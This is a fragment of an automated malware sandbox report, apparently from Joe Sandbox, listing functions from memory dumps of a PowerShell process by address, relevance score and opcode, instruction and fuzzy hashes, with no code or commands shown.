                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bab0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 14bb9041e0f947f39e18c3aa8acc0a5ef45487655c050c0f91f456dce37760e2
                                                                                                          • Instruction ID: a735a285092e16952cd617c2e188f1c4b02c24ed0d385a182afc95c4dfc0db13
                                                                                                          • Opcode Fuzzy Hash: 14bb9041e0f947f39e18c3aa8acc0a5ef45487655c050c0f91f456dce37760e2
                                                                                                          • Instruction Fuzzy Hash: 51312130A1964DCEFBB4AF55CD15BF93291FF41329F414139D44D871A2CAB86A45CB11
                                                                                                          Function 00007FFD9BAB5675 Relevance: .0, Instructions: 49COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1798304884.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bab0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 561cdfff6d0ba7e14d648c57dba9d7c719ad949a33057165d4482dc443437060
                                                                                                          • Instruction ID: ef4a72a1ef537b7cfa0d0576486500fa1543b639a7da482cd184056b2a0a8c29
                                                                                                          • Opcode Fuzzy Hash: 561cdfff6d0ba7e14d648c57dba9d7c719ad949a33057165d4482dc443437060
                                                                                                          • Instruction Fuzzy Hash: BA01847021CB0C4FD748EF0CE451AA5B7E0FB85360F10056EE58AC76A1D632E881CB45
                                                                                                          Function 00007FFD9BAB5A85 Relevance: .0, Instructions: 40COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1798304884.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bab0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6d344f26b5d0f559e8fcf29a4105dc715639ffbb7c04ca811f1b35d776759de0
                                                                                                          • Instruction ID: 2516f1320191137b91730f71aa79169aed8a27b622861b4b9d47a901b48d6612
                                                                                                          • Opcode Fuzzy Hash: 6d344f26b5d0f559e8fcf29a4105dc715639ffbb7c04ca811f1b35d776759de0
                                                                                                          • Instruction Fuzzy Hash: 41F0653170CA0C4BA70CAA1CB8565F973C1DF99361B10417FF40AC7696EC26AC8386C5
                                                                                                          Function 00007FFD9BD61C72 Relevance: .0, Instructions: 39COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1802719880.00007FFD9BD60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BD60000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bd60000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ceaefe198905d053fafa484eae18e3cfa7326e91deac6425564a31d235506308
                                                                                                          • Instruction ID: 76fa572cbf402e0c627328af416945aba52130e79fe60c230c76dd3ebf92b901
                                                                                                          • Opcode Fuzzy Hash: ceaefe198905d053fafa484eae18e3cfa7326e91deac6425564a31d235506308
                                                                                                          • Instruction Fuzzy Hash: 6CF0B432B0D5098FD769EB4CE4528AC73E0FF0532071610B6E15DC74B7DA26AC05C740
                                                                                                          Function 00007FFD9BD61F20 Relevance: .0, Instructions: 35COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1802719880.00007FFD9BD60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BD60000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bd60000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e83238e4514fd5531b14bea90aaca21b9d3218dc4ce5c0b15f9e8383fe6b0319
                                                                                                          • Instruction ID: 3b6e1497e4f317757c8217874c0c09736950f8d0a2743897c3809eaadba27e8d
                                                                                                          • Opcode Fuzzy Hash: e83238e4514fd5531b14bea90aaca21b9d3218dc4ce5c0b15f9e8383fe6b0319
                                                                                                          • Instruction Fuzzy Hash: 50F05E32B0E5498FDB69EA9CE4528A877E0FF0532071550B6E15EC74A3CB26EC40C750

                                                                                                          Non-executed Functions

                                                                                                          Function 00007FFD9BAB84FA Relevance: 11.5, Strings: 9, Instructions: 221COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1798304884.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bab0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: M_^$M_^$M_^$M_^$M_^$M_^$M_^$M_^$M_^
                                                                                                          • API String ID: 0-4011484131
                                                                                                          • Opcode ID: 3f8cfca1703d8db53d138871c41e994ee5fe94f173748bac622ac29c9d5700b3
                                                                                                          • Instruction ID: 2def0bef0c29edac377d3eb92aaf0642ec1330c95581804ea29bbd0aa1c04cca
                                                                                                          • Opcode Fuzzy Hash: 3f8cfca1703d8db53d138871c41e994ee5fe94f173748bac622ac29c9d5700b3
                                                                                                          • Instruction Fuzzy Hash: 70517593E0FAEA5BE226477D487A4943F90FF22568B4F13E7C0E84B1A3BD5439464641
                                                                                                          Function 00007FFD9BAB86F2 Relevance: 6.4, Strings: 5, Instructions: 151COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1798304884.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bab0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: M_^$M_^$M_^$M_^$M_^
                                                                                                          • API String ID: 0-2396788759
                                                                                                          • Opcode ID: 229ae89354eccfed9357d251e78864c1e3dbb38c472d0c566642cceb12367761
                                                                                                          • Instruction ID: 405db612b05702757a7cd1e0b42b53707dcfee4853f8b84efbe5cf2233aa799d
                                                                                                          • Opcode Fuzzy Hash: 229ae89354eccfed9357d251e78864c1e3dbb38c472d0c566642cceb12367761
                                                                                                          • Instruction Fuzzy Hash: D3418492E0F6EA1BF76217BD483A4653B90FF11968F4B12F6C4F44B0A3BD5429864641